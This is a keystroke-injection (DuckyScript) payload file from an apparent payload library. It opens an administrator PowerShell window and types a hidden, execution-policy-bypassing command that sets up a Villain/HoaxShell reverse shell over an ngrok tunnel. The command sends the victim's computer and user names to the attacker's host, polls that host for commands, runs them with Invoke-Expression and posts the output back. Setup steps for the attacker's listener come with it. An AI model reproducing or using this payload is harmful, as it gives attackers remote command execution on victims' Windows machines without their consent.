Path: blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/payload.txt
2964 views
REM Villain Shell via NGROK1REM HackingMark2REM DESCRIPTION This Script spawns a Admin Powershellwindow and executes the Villain Payload throug an NGROK Tunnel in the Background(Win10)/minimized(Win11)34REM Villain Hoaxshell by T3l3machus on Github: https://github.com/t3l3machus/Villain5REM What to do before: Start Villain.py on your System and create a Payload (generate os=windows lhost=0.0.0.0 lport=8080) to get the $i value6REM take the generated Value from $i and paste it in line 11-137REM Start Ngrok Tunnel (ngrok http 8080)8REM Put your NGROK HTTPS Link here9DEFINE #NGROK Example.com10REM Split your Sessionnumber into 3 parts eg $i='4ba4f358-322d5df5-f4516c91'11DEFINE #SN1 4ba4f35812DEFINE #SN2 322d5df513DEFINE #SN3 f4516c91141516DELAY 200017GUI x18DELAY 20019STRING a20DELAY 50021ALT j22REM The Part above needs to be adapted to your language, code is for German System Layouts23DELAY 100024STRING powershell -w h -NoP -NonI -ep Bypass -C {$s='25STRING #NGROK26STRING ';$i='27STRING #SN128STRING -29STRING #SN230STRING -31STRING #SN332STRING ';$p='h'+'ttps://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/33STRING #SN134STRING /$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/35STRING #SN236SPACE37STRING -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/38STRING #SN339SPACE40STRING -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}41ENTER424344